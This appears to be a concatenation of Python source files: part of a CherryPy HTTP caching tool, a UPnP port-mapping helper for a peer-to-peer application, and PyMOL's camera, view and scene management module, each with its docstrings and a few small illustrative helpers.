cherrypy.log('Ignoring cache due to Cache-Control: no-cache',
'TOOLS.CACHING')
request.cached = False
request.cacheable = True
return False
if debug:
cherrypy.log('Reading response from cache', 'TOOLS.CACHING')
s, h, b, create_time = cache_data
age = int(response.time - create_time)
if (age > max_age):
if debug:
cherrypy.log('Ignoring cache due to age > %d' % max_age,
'TOOLS.CACHING')
request.cached = False
request.cacheable = True
return False
# Copy the response headers. See http://www.cherrypy.org/ticket/721.
response.headers = rh = httputil.HeaderMap()
for k in h:
dict.__setitem__(rh, k, dict.__getitem__(h, k))
# Add the required Age header
response.headers["Age"] = str(age)
try:
# Note that validate_since depends on a Last-Modified header;
# this was put into the cached copy, and should have been
# resurrected just above (response.headers = cache_data[1]).
cptools.validate_since()
except cherrypy.HTTPRedirect as x:
if x.status == 304:
cherrypy._cache.tot_non_modified += 1
raise
# serve it & get out from the request
response.status = s
response.body = b
else:
if debug:
cherrypy.log('request is not cached', 'TOOLS.CACHING')
return request.cached
def tee_output():
request = cherrypy.serving.request
if 'no-store' in request.headers.values('Cache-Control'):
return
def tee(body):
"""Tee response.body into a list."""
if ('no-cache' in response.headers.values('Pragma') or
'no-store' in response.headers.values('Cache-Control')):
for chunk in body:
yield chunk
return
output = []
for chunk in body:
output.append(chunk)
yield chunk
# save the cache data
body = ''.join(output)
cherrypy._cache.put((response.status, response.headers or {},
body, response.time), len(body))
response = cherrypy.serving.response
response.body = tee(response.body)
def expires(secs=0, force=False, debug=False):
"""Tool for influencing cache mechanisms using the 'Expires' header.
'secs' must be either an int or a datetime.timedelta, and indicates the
number of seconds between response.time and when the response should
expire. The 'Expires' header will be set to (response.time + secs).
If 'secs' is zero, the 'Expires' header is set one year in the past, and
the following "cache prevention" headers are also set:
'Pragma': 'no-cache'
'Cache-Control': 'no-cache, must-revalidate'
If 'force' is False (the default), the following headers are checked:
'Etag', 'Last-Modified', 'Age', 'Expires'. If any are already present,
none of the above response headers are set.
"""
response = cherrypy.serving.response
headers = response.headers
cacheable = False
if not force:
# some header names that indicate that the response can be cached
for indicator in ('Etag', 'Last-Modified', 'Age', 'Expires'):
if indicator in headers:
cacheable = True
break
if not cacheable and not force:
if debug:
cherrypy.log('request is not cacheable', 'TOOLS.EXPIRES')
else:
if debug:
cherrypy.log('request is cacheable', 'TOOLS.EXPIRES')
if isinstance(secs, datetime.timedelta):
secs = (86400 * secs.days) + secs.seconds
if secs == 0:
if force or ("Pragma" not in headers):
headers["Pragma"] = "no-cache"
if cherrypy.serving.request.protocol >= (1, 1):
if force or "Cache-Control" not in headers:
headers["Cache-Control"] = "no-cache, must-revalidate"
# Set an explicit Expires date in the past.
expiry = httputil.HTTPDate(1169942400.0)
else:
expiry = httputil.HTTPDate(response.time + secs)
if force or "Expires" not in headers:
headers["Expires"] = expiry
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "dogia", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run dogia, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
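# --- Illustrative sketch, not part of the original module ---
# Intended lifecycle of the UPnP helper above: queue a port mapping, release
# it later, then stop the worker thread. Requires miniupnpc and a UPnP-capable
# gateway; the port number 8444 is arbitrary and used only for illustration.
if __name__ == "__main__":
    upnp = UPnP()
    upnp.remap(8444)    # ask the worker thread to open TCP port 8444
    upnp.release(8444)  # close the mapping again
    upnp.shutdown()     # drain the queue and join the worker thread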
|
viewing.py
|
#A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-* Filipe Maia (slicing code)
#-*
#-*
#Z* -------------------------------------------------------------------
from . import colorprinting
if True:
import sys
import threading
import pymol
from . import selector
import copy
from . import parsing
import re
cmd = sys.modules["pymol.cmd"]
from .cmd import _cmd, Shortcut, \
_feedback,fb_module,fb_mask, \
repres,repres_sc, is_string, is_list, \
repmasks,repmasks_sc, \
toggle_dict,toggle_sc,stereo_dict,stereo_sc, \
palette_dict, palette_sc, window_dict, window_sc, \
safe_list_eval, safe_alpha_list_eval, \
location_code, location_sc, boolean_dict, boolean_sc, \
DEFAULT_ERROR, DEFAULT_SUCCESS
palette_colors_dict = {
'rainbow_cycle' : 'magenta blue cyan green yellow orange red magenta',
'rainbow_cycle_rev' : 'magenta red orange yellow green cyan blue magenta',
'rainbow' : 'blue cyan green yellow orange red',
'rainbow_rev' : 'red orange yellow green cyan blue',
'rainbow2' : 'blue cyan green yellow orange red',
'rainbow2_rev' : 'red orange yellow green cyan blue',
'gcbmry' : 'green cyan blue magenta red yellow',
'yrmbcg' : 'yellow red magenta blue cyan green',
'cbmr' : 'cyan blue magenta red',
'rmbc' : 'red magenta blue cyan',
}
rep_list = [ "lines", "sticks", "spheres", "dots", "surface",
"mesh", "nonbonded", "nb_spheres", "cartoon",
"ribbon", "labels", "slice", "ellipsoids", "volume" ]
scene_action_sc = Shortcut(['store','recall','clear','insert_before',
'insert_after','next','previous',
'start', 'update','rename','delete',
'order', 'sort', 'first',
'append'])
scene_action_dict = {}
scene_action_dict_sc = Shortcut([])
view_sc = Shortcut(['store','recall','clear'])
def zoom(selection="all", buffer=0.0, state=0, complete=0, animate=0, *, _self=cmd):
'''
DESCRIPTION
"zoom" scales and translates the window and the origin to cover the
atom selection.
USAGE
zoom [ selection [, buffer [, state [, complete [, animate ]]]]]
EXAMPLES
zoom
zoom complete=1
zoom 142/, animate=3
zoom (chain A)
ARGUMENTS
selection = string: selection-expression or name pattern {default: all}
buffer = float: distance {default: 0}
state = 0: uses all coordinate states {default}
state = -1: uses only coordinates for the current state
state > 0: uses coordinates for a specific state
complete = 0 or 1: will ensure no atom centers are clipped
animate < 0: uses the default animation duration
animate = 0: no animation
animate > 0: animates using the provided duration in seconds
PYMOL API
cmd.zoom(string selection, float buffer, int state, int complete,
int animate)
NOTES
The zoom command normally tries to guess an optimal zoom level for
visualization, balancing closeness against occasional clipping of
atoms out of the field of view. You can change this behavior by
setting the complete option to 1, which will guarantee that the
atom positions for the entire selection will fit in the field of
an orthoscopic view.
To absolutely prevent clipping, you may also need to add an
additional buffer (typically 2 A) to account for graphical
representations which extend beyond the atom coordinates.
SEE ALSO
origin, orient, center
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.zoom(_self._COb,str(selection),float(buffer),
int(state)-1,int(complete),float(animate))
return r
def center(selection="all", state=0, origin=1, animate=0, *, _self=cmd):
'''
DESCRIPTION
"center" translates the window, the clipping slab, and the
origin to a point centered within the atom selection.
USAGE
center [ selection [, state [, origin [, animate ]]]]
EXAMPLES
center chain B
center 145/
ARGUMENTS
selection = string: selection-expression or name pattern (default: "all").
state = 0 (default) use all coordinate states
state = -1 use only coordinates for the current state
state > 0 use coordinates for a specific state
origin = 1 (default) move the origin
origin = 0 leave the origin unchanged
PYMOL API
cmd.center(string selection, int state, int origin)
SEE ALSO
origin, orient, zoom
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.center(_self._COb,str(selection),int(state)-1,int(origin),float(animate))
return r
clip_action_sc = Shortcut([ 'near','far','move','slab','atoms' ])
def clip(mode, distance, selection=None, state=0, *, _self=cmd):
'''
DESCRIPTION
"clip" alters the positions of the clipping planes.
USAGE
clip mode, distance [, selection [, state ]]
ARGUMENTS
mode = near, far, move, slab, or atoms
distance is a floating point value
selection = atom selection (for mode=atoms only)
EXAMPLES
clip near, -5 # moves near plane away from you by 5 A
clip far, 10 # moves far plane towards you by 10 A
clip move, -5 # moves the slab away from you by 5 A
clip slab, 20 # sets slab thickness to 20 A
clip slab, 10, resi 11 # clip 10 A slab about residue 11
clip atoms, 5, pept # clip atoms in "pept" with a 5 A buffer
# about their current camera positions
PYMOL API
cmd.clip(string mode, float distance, string selection, int state)
SEE ALSO
zoom, orient, reset
'''
mode = clip_action_sc.auto_err(str(mode),'mode')
if selection is not None:
selection = selector.process(selection)
else:
selection = ''
with _self.lockcm:
r = _cmd.clip(_self._COb,str(mode),float(distance),
str(selection),int(state)-1)
return r
def origin(selection="(all)", object=None, position=None, state=0, *, _self=cmd):
'''
DESCRIPTION
"origin" sets the center of rotation about a selection. If an
object name is specified, it can be used to set the center of
rotation for the object (for use in animation and editing).
USAGE
origin [ selection [, object [,position, [, state ]]]]
ARGUMENTS
selection = string: selection-expression or name-list {default: (all)}
state = 0 (default) use all coordinate states
state = -1 use only coordinates for the current state
state > 0 use coordinates for a specific state
EXAMPLES
origin chain A
origin position=[1.0,2.0,3.0]
PYMOL API
cmd.origin(string object-or-selection)
SEE ALSO
zoom, orient, reset
'''
#'
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
if object is None: object=''
if position is None: position=(0.0,0.0,0.0)
else:
if _self.is_string(position):
position = safe_list_eval(position)
selection = ''
r = _cmd.origin(_self._COb,selection,str(object),
(float(position[0]),
float(position[1]),
float(position[2])
),int(state)-1)
return r
def orient(selection="(all)", state=0, animate=0, *, _self=cmd):
'''
DESCRIPTION
"orient" aligns the principal components of the atoms in the
selection with the XYZ axes.
USAGE
orient [ selection [, state [, animate ]]]
ARGUMENTS
selection = a selection-expression or name-pattern {default: (all)}
state = 0: use all coordinate states {default}
state = -1: uses only coordinates for the current state
state > 0: uses coordinates for a specific state
EXAMPLES
orient organic
NOTES
The function is similar to the orient command in X-PLOR.
PYMOL API
cmd.orient(string object-or-selection, int state, float animate)
SEE ALSO
zoom, origin, reset
'''
# preprocess selection
selection = selector.process(selection)
with _self.lockcm:
return _cmd.orient(_self._COb,"("+selection+")",int(state)-1,float(animate))
def move(axis, distance, *, _self=cmd):
'''
DESCRIPTION
"move" translates the camera about one of the three primary axes.
USAGE
move axis, distance
EXAMPLES
move x, 3
move y, -1
PYMOL API
cmd.move(string axis, float distance)
SEE ALSO
turn, rotate, translate, zoom, center, clip
'''
with _self.lockcm:
return _cmd.move(_self._COb,str(axis),float(distance))
def enable(name='all', parents=0, *, _self=cmd):
'''
DESCRIPTION
"enable" turns on display of one or more objects and/or selections.
USAGE
enable name
ARGUMENTS
name = name-pattern or selection.
NOTES
If name matches a selection name, then selection indicator dots
are shown for atoms in that selection. If name is a
selection-expression, then all objects with atoms in that
selection are enabled.
For an object\'s content to be displayed in the 3D viewer, the
object must be enabled AND at least one of the available
representations must be shown.
PYMOL API
cmd.enable(string object-name)
EXAMPLES
enable target_protein # enables the target_protein object
enable 1dn2.* # enables all entities starting with 1dn2.
enable *lig # enables all entities ending with lig
SEE ALSO
show, hide, disable
'''
if name[0]=='(':
selection = selector.process(name)
with _self.lockcm:
r = _cmd.onoff_by_sele(_self._COb,selection,1)
else:
with _self.lockcm:
r = _cmd.onoff(_self._COb,str(name),1,int(parents));
return r
def disable(name='all', *, _self=cmd):
'''
DESCRIPTION
"disable" turns off display of one or more objects and/or selections.
USAGE
disable name
ARGUMENTS
name = name-pattern or selection.
PYMOL API
cmd.disable(string name)
SEE ALSO
show, hide, enable
'''
if name[0]=='(':
selection = selector.process(name)
with _self.lockcm:
r = _cmd.onoff_by_sele(_self._COb,selection,0)
else:
with _self.lockcm:
r = _cmd.onoff(_self._COb,str(name),0,0);
return r
def _rep_to_repmask(rep):
repn = 0
for rep in rep.split():
rep = repmasks_sc.auto_err(rep, 'representation')
repn |= repmasks[rep]
return repn
def toggle(representation="lines", selection="all", *, _self=cmd):
'''
DESCRIPTION
"toggle" toggles the visibility of a representation within a
selection.
USAGE
toggle [ representation [, selection ]]
ARGUMENTS
representation = string: named representation {default: lines}
selection = string: atom selection {default: all}
NOTES
If the representation is enabled for any atom in the selection, it will
be turned off.
PYMOL API
cmd.toggle(string representation, string selection)
SEE ALSO
show, hide
'''
with _self.lockcm:
if representation == 'object':
repn = -2
else:
repn = _rep_to_repmask(representation)
# preprocess selection
selection = selector.process(selection)
r = _cmd.toggle(_self._COb,str(selection),int(repn));
return r
def _showhide(rep, selection, value, _self):
if not selection and (rep in ("", "all") or '(' in rep or '/' in rep):
# rep looks like a selection
selection = rep
rep = "wire" if value else "everything"
selection = selector.process(selection) or "all"
repn = _rep_to_repmask(rep)
with _self.lockcm:
r = _cmd.showhide(_self._COb, str(selection), int(repn), value)
return r
def show(representation="wire", selection="", *, _self=cmd):
'''
DESCRIPTION
"show" turns on representations for objects and selections.
USAGE
show [ representation [, selection ]]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon, sticks,
dots, surface, labels, extent, nonbonded, nb_spheres, slice,
extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
or everything
selection = string: a selection-expression or name-pattern
NOTES
With no arguments, "show" alone turns on lines for all bonds and
nonbonded for all atoms in all molecular objects.
EXAMPLES
show
show ribbon
show lines, (name CA+C+N)
SEE ALSO
hide, enable, disable
'''
return _showhide(representation, selection, 1, _self)
def show_as(representation="wire", selection="", *, _self=cmd):
'''
DESCRIPTION
"as" turns on and off atom and bond representations.
USAGE
as representation [, selection ]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon, sticks,
dots, surface, labels, extent, nonbonded, nb_spheres, slice,
extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
volume or everything
selection = string {default: all}
EXAMPLES
as lines, name CA+C+N
as ribbon
PYMOL API
cmd.show_as(string representation, string selection)
NOTES
"selection" can be an object name
"as" alone will turn on lines and nonbonded and hide everything else.
SEE ALSO
show, hide, enable, disable
'''
return _showhide(representation, selection, 2, _self)
def hide(representation="everything", selection="", *, _self=cmd):
'''
DESCRIPTION
"hide" turns off atom and bond representations.
USAGE
hide [ representation [, selection ]]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon,
sticks, dots, surface, labels, extent, nonbonded, nb_spheres,
slice, extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
or everything
selection = string: a selection-expression or name-pattern
EXAMPLES
hide lines, all
hide ribbon
PYMOL API
cmd.hide(string representation, string selection)
SEE ALSO
show, enable, disable
'''
return _showhide(representation, selection, 0, _self)
def get_view(output=1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"get_view" returns and optionally prints out the current view
information in a format which can be embedded into a command
script and can be used in subsequent calls to "set_view".
If a log file is currently open, get_view will not write the view
matrix to the screen unless the "output" parameter is 2.
USAGE
get_view [output]
ARGUMENTS
output = 0: output matrix to screen
output = 1: do not output matrix to screen
output = 2: force output to screen even if log file is open
output = 3: return formatted string instead of a list
NOTES
Contents of the view matrix:
* 0 - 8: column-major 3x3 matrix which rotates model space to camera space
* 9 - 11: origin of rotation relative to camera (in camera space)
* 12 - 14: origin of rotation (in model space)
* 15: front plane distance from the camera
* 16: rear plane distance from the camera
* 17: orthoscopic flag (+/-) and field of view (if abs(value) > 1)
The camera always looks down -Z with its +X left and its +Y down.
Therefore, in the default view, model +X is to the observer\'s
right, +Y is upward, and +Z points toward the observer.
PYMOL API
cmd.get_view(output=1, quiet=1)
SEE ALSO
set_view
'''
with _self.lockcm:
r = _cmd.get_view(_self._COb)
if True:
output = int(output)
if True:
if (_self.get_setting_int("logging") != 0) and (output<3):
if not quiet:
print(" get_view: matrix written to log file.")
_self.log("_ set_view (\\\n","cmd.set_view((\\\n")
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[0:3] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[0:3])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[4:7] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[4:7])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[8:11] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[8:11])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[16:19],
" %14.9f, %14.9f, %14.9f,\\\n"%r[16:19])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[19:22],
" %14.9f, %14.9f, %14.9f,\\\n"%r[19:22])
_self.log("_ %14.9f, %14.9f, %14.9f )\n"%r[22:25] ,
" %14.9f, %14.9f, %14.9f ))\n"%r[22:25])
if output<2: # suppress if we have a log file open
output=0
if output and (not quiet) and (output<3):
print("### cut below here and paste into script ###")
print("set_view (\\")
print(" %14.9f, %14.9f, %14.9f,\\"%r[0:3])
print(" %14.9f, %14.9f, %14.9f,\\"%r[4:7])
print(" %14.9f, %14.9f, %14.9f,\\"%r[8:11])
print(" %14.9f, %14.9f, %14.9f,\\"%r[16:19])
print(" %14.9f, %14.9f, %14.9f,\\"%r[19:22])
print(" %14.9f, %14.9f, %14.9f )"%r[22:25])
print("### cut above here and paste into script ###")
if output==3:
return ("set_view (\\\n"+
" %14.9f, %14.9f, %14.9f,\\\n"%r[0:3] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[4:7] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[8:11] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[16:19] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[19:22] +
" %14.9f, %14.9f, %14.9f )\n"%r[22:25])
r = r[0:3]+r[4:7]+r[8:11]+r[16:25]
return r
def set_view(view,animate=0,quiet=1,hand=1, *, _self=cmd):
r'''
DESCRIPTION
"set_view" sets viewing information for the current scene,
including the rotation matrix, position, origin of rotation,
clipping planes, and the orthoscopic flag.
USAGE
set_view [ view ]
EXAMPLE
set_view (\
0.999876618, -0.000452542, -0.015699286,\
0.000446742, 0.999999821, -0.000372844,\
0.015699454, 0.000365782, 0.999876678,\
0.000000000, 0.000000000, -150.258514404,\
11.842411041, 20.648729324, 8.775371552,\
118.464958191, 182.052062988, 0.000000000 )
PYMOL API
cmd.set_view(string-or-sequence view)
SEE ALSO
get_view
'''
if isinstance(view, (str, bytes)):
view = safe_list_eval(view)
if len(view)!=18:
raise pymol.CmdException(
"bad view argument; should be a sequence of 18 floats")
with _self.lockcm:
r = _cmd.set_view(_self._COb,(
float(view[ 0]),float(view[ 1]),float(view[ 2]),0.0,
float(view[ 3]),float(view[ 4]),float(view[ 5]),0.0,
float(view[ 6]),float(view[ 7]),float(view[ 8]),0.0,
0.0,0.0,0.0,1.0,
float(view[ 9]),float(view[10]),float(view[11]),
float(view[12]),float(view[13]),float(view[14]),
float(view[15]),float(view[16]),float(view[17])),
int(quiet),float(animate),int(hand))
return r
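# --- Illustrative sketch, not part of the original PyMOL module ---
# Round-trips the 18-element view tuple documented in get_view() above: read
# the current view, push the rear clipping plane 10 A further from the camera
# to widen the visible slab, and apply the modified view. Assumes a running
# PyMOL session; the 10 A offset is an arbitrary example value.
def _widen_slab_example(_self=cmd):
    v = list(_self.get_view(output=0))
    v[16] += 10.0  # element 16 = rear plane distance from the camera
    _self.set_view(v)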
def view(key, action='recall', animate=-1, *, _self=cmd):
'''
DESCRIPTION
"view" saves and restore camera views.
USAGE
view key [, action [, animate]]
ARGUMENTS
key = string or *
action = store, recall, clear: {default: recall}
NOTES
Views F1 through F12 are automatically bound to function keys
provided that "set_key" has not been used to redefine the
behaviour of the respective key, and that a "scene" has not been
defined for that key.
EXAMPLES
view 0, store
view 0
PYMOL API
cmd.view(string key, string action)
SEE ALSO
scene, set_view, get_view
'''
pymol=_self._pymol
if key=='*':
action = view_sc.auto_err(action,'action')
if action=='clear':
pymol._view_dict = {}
pymol._view_dict_sc = Shortcut(pymol._view_dict.keys())
else:
print(" view: stored views:")
lst = list(pymol._view_dict.keys())
lst.sort()
parsing.dump_str_list(lst)
else:
action = view_sc.auto_err(action,'action')
if action=='recall':
key = pymol._view_dict_sc.auto_err(key,'view')
_self.set_view(pymol._view_dict[key],animate=animate)
if _feedback(fb_module.scene,fb_mask.actions,_self): # redundant
print(" view: \"%s\" recalled."%key)
elif (action=='store') or (action=='update'):
pymol._view_dict_sc.append(key)
pymol._view_dict[key]=_self.get_view(0)
if _feedback(fb_module.scene,fb_mask.actions,_self):
print(" view: view "+action+"d as \"%s\"."%key)
elif action=='clear':
key = pymol._view_dict_sc.auto_err(key,'view')
if key in pymol._view_dict:
del pymol._view_dict[key]
pymol._view_dict_sc = Shortcut(pymol._view_dict.keys())
if _feedback(fb_module.scene,fb_mask.actions,_self): # redundant
print(" view: '%s' deleted."%key)
def get_viewport(output=1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"get_viewport" returns and optionally prints out the screen viewport size
USAGE
get_viewport [output]
ARGUMENTS
output = 0: do not print to screen
output = 1 {default}: print to screen if not logging and not quiet
output = 2: force output to screen even if log file is open
PYMOL API
cmd.get_viewport(output=1, quiet=1)
'''
output = int(output)
with _self.lockcm:
r = _cmd.get_viewport(_self._COb)
if _self.get_setting_int("logging") and output < 3:
_self.log(f"_ viewport {r[0]}, {r[1]}\n", f"cmd.viewport{r}\n")
if not quiet:
print(" get_viewport: data written to log file.")
if output < 2: # suppress if we have a log file open
output = 0
if (0 < output < 3) and not quiet:
print("### cut below here and paste into script ###")
print("viewport %4d, %4d" % r)
print("### cut above here and paste into script ###")
if output == 3:
colorprinting.warning(" Warning: get_viewport(3) is deprecated")
return "viewport ( %4d, %4d )\n" % r
return r
def get_vis(_self=cmd):
with _self.lockcm:
return _cmd.get_vis(_self._COb)
def set_vis(dict, *, _self=cmd):
with _self.lockcm:
return _cmd.set_vis(_self._COb, dict)
def get_colorection(key, *, _self=cmd):
with _self.lockcm:
return _cmd.get_colorection(_self._COb, key)
def set_colorection(dict,key, *, _self=cmd):
with _self.lockcm:
return _cmd.set_colorection(_self._COb, dict, key)
def del_colorection(dict,key, *, _self=cmd):
with _self.lockcm:
return _cmd.del_colorection(_self._COb, dict, key)
def get_scene_list(_self=cmd):
with _self.lockcm:
return _cmd.get_scene_order(_self._COb)
def chain_session(_self=cmd):
import os
# assumes locked interpreter
r = 0
session_file = str(_self.get("session_file"))
re_pat = re.compile(r"[0-9]+\.")
if len(session_file): # find next session file, if it exists
mo = re_pat.search(session_file)
if mo is not None:
pat = mo.group(0)
if len(pat):
file_no = int(float(pat)) + 1
new_form = r"%0"+str(len(pat)-1)+"d."
for new_num in range(file_no, file_no+11):
new_pat = new_form % new_num
new_file = re_pat.sub(new_pat, session_file)
# try both PSE and PSW
if not os.path.exists(new_file):
new_file = re.sub(r"\.pse$", ".psw", new_file, flags=re.I)
if not os.path.exists(new_file):
new_file = re.sub(r"\.psw$", ".pse", new_file, flags=re.I)
if os.path.exists(new_file):
_self.do("_ cmd.load(r'''"+new_file+"''',format='psw')")
return 1
return 0
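# --- Illustrative sketch, not part of the original PyMOL module ---
# Mirrors the filename rule used by chain_session() above: the first run of
# digits before a dot is incremented while its zero padding is preserved.
# The filename "movie_001.pse" is a made-up example.
def _next_session_name_example(session_file="movie_001.pse"):
    """Illustration only: 'movie_001.pse' -> 'movie_002.pse'."""
    mo = re.search(r"[0-9]+\.", session_file)
    pat = mo.group(0)
    new_form = "%0" + str(len(pat) - 1) + "d."
    return re.sub(r"[0-9]+\.", new_form % (int(float(pat)) + 1), session_file)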
def scene_order(names,sort=0,location='current',quiet=1, *, _self=cmd):
'''
DESCRIPTION
"scene_order" changes the ordering of scenes.
USAGE
scene_order names, sort, location
ARGUMENTS
names = string: a space-separated list of names
sort = yes or no {default: no}
location = top, current, or bottom {default: current}
EXAMPLES
scene_order *,yes
scene_order F6 F4 F3
scene_order 003 006 004, location=top
PYMOL API
cmd.scene_order(string names, string sort, string location)
SEE ALSO
scene
'''
location = location_sc.auto_err(location,'location')
if is_string(sort):
sort=boolean_dict[boolean_sc.auto_err(sort,'sort option')]
with _self.lockcm:
return _cmd.scene_order(_self._COb, names, sort, location)
def _scene_get_current_message(_self=cmd):
wiz = _self.get_wizard()
return '\n'.join(wiz.message) if (wiz is not None
and wiz.__class__.__name__ == 'Message'
and hasattr(wiz, 'from_scene')) else None
def scene_recall_message(message, *, _self=cmd):
'''
INTERNAL, DO NOT USE.
Display a scene message.
'''
wiz = _self.get_wizard()
replace_flag = (wiz is not None
and wiz.__class__.__name__ == 'Message'
and hasattr(wiz, 'from_scene'))
if message:
if is_string(message):
message = message.splitlines()
elif not is_list(message):
raise TypeError("message %s" % (type(message)))
wizard_func = _self.replace_wizard if replace_flag else _self.wizard
wizard_func("message", *message)
_self.get_wizard().from_scene = 1
elif replace_flag:
_self.wizard()
def scene(key='auto', action='recall', message=None, view=1,
color=1, active=1, rep=1, frame=1, animate=-1,
new_key=None, hand=1, quiet=1, sele="all", *, _self=cmd):
'''
DESCRIPTION
"scene" saves and restores scenes. A scene consists of the camera
view, all object activity information, all atom-wise visibilities,
all atom-wise colors, all representations, the global frame index,
and may contain a text message to display on playback.
USAGE
scene [key [,action [, message, [ new_key=new-key-value ]]]]
ARGUMENTS
key = string, new, auto, or *: use new for an automatically
numbered new scene, use auto for the current scene (if one
exists), and use * for all scenes (clear and recall actions only).
action = store, recall, insert_after, insert_before, next,
previous, update, rename, or clear: (default = recall). If
rename, then a new_key argument must be explicitly defined.
message = string: a text message to display with the scene.
new_key = string: the new name for the scene
EXAMPLES
scene *
scene F1, store
scene F2, store, Please note the critical hydrogen bond shown in yellow.
scene F1
scene F2
scene F1, rename, new_key=F5
NOTES
Scenes F1 through F12 are automatically bound to function keys
provided that "set_key" has not been used to redefine the behaviour
of the respective key.
SEE ALSO
view, set_view, get_view
'''
action = scene_action_sc.auto_err(action, 'action')
if is_list(message):
message = '\n'.join(message)
# default when called with no arguments
if key == 'auto':
if action == 'recall':
action = 'next'
# preserve message on update
if action == 'update':
if message is None:
message = _scene_get_current_message(_self)
# aliases (DEPRECATED)
if action == 'clear':
action = 'delete'
elif action == 'append' or action == 'update':
action = 'store'
# presentation auto quit
if (pymol._scene_quit_on_action == action and
action in ('next', 'previous') and
_self.get_setting_boolean("presentation") and
_self.get_setting_boolean("presentation_auto_quit") and
_self.get("scene_current_name") == ""):
if not chain_session(_self):
_self.quit()
# call C function
with _self.lockcm:
r = _cmd.scene(_self._COb, key, action, message, int(view),
int(color), int(active), int(rep), int(frame),
float(animate), new_key, int(hand), sele)
# autocomplete
if action in ('store', 'delete') or action.startswith('insert_'):
_self._pymol._scene_dict_sc.rebuild(_self.get_scene_list())
# for presentation auto quit
pymol._scene_quit_on_action = action
return r
def _legacy_scene(key='auto', action='recall', message=None, view=1,
color=1, active=1, rep=1, frame=1, animate=-1,
new_key=None, hand=1, quiet=1, *, _self=cmd):
''' FOR INTERNAL USE ONLY. Stores and deletes <=1.7.4 compatible scenes. '''
pymol=_self._pymol
view = int(view)
rep = int(rep)
color = int(color)
active = int(active)
frame = int(frame)
quiet = int(quiet)
animate = 0
with _self.lockcm:
if key=='*':
if action=='clear':
for key in pymol._scene_dict:
# free selections
scene_list = pymol._scene_dict[key]
if len(scene_list)>3:
colorection = scene_list[3]
if colorection is not None:
_self.del_colorection(colorection,key)
name = "_scene_"+key+"_*"
_self.delete(name)
else:
raise ValueError('action=' + action)
else:
if action == 'store':
if key in ('new', 'auto'):
raise ValueError('key=' + key)
if key in pymol._scene_dict:
raise RuntimeError('update not supported')
if rep:
for rep_name in rep_list:
name = "_scene_"+key+"_"+rep_name
_self.select(name,"rep "+rep_name)
if is_string(message):
if message:
if (message[0:1] in [ '"',"'"] and
message[-1:] in [ '"',"'"]):
message=message[1:-1]
else:
message = message.splitlines()
pymol._scene_dict[key] = [
_self.get_view(0) if view else None,
_self.get_vis() if active else None,
_self.get_frame() if frame else None,
_self.get_colorection(key) if color else None,
1 if rep else None,
message,
]
else:
raise ValueError('action=' + action)
def session_save_views(session, *, _self=cmd):
pymol=_self._pymol
session['view_dict']=copy.deepcopy(pymol._view_dict)
return 1
def session_restore_views(session, *, _self=cmd):
pymol=_self._pymol
if 'view_dict' in session:
pymol._view_dict=copy.deepcopy(session['view_dict'])
pymol._view_dict_sc.rebuild(list(pymol._view_dict.keys()))
return 1
def session_restore_scenes(session, *, _self=cmd):
# Restore scenes from old session files (<= 1.7.4)
if 'scene_dict' in session:
_self.scene('*', 'clear')
# save initial scene
tempname = '_initial_scene'
while tempname in session['scene_dict']:
tempname += '_'
_self.scene(tempname, 'store')
frame = 0
if _self.get_movie_playing():
_self.mstop()
frame = _self.get_frame()
for key, data in list(session['scene_dict'].items()):
_convert_legacy_scene(key, data, _self)
if frame:
_self.frame(frame)
_self.mplay()
# restore initial scene
_self.scene(tempname, 'recall', animate=0)
_self.scene(tempname, 'clear')
if 'scene_order' in session:
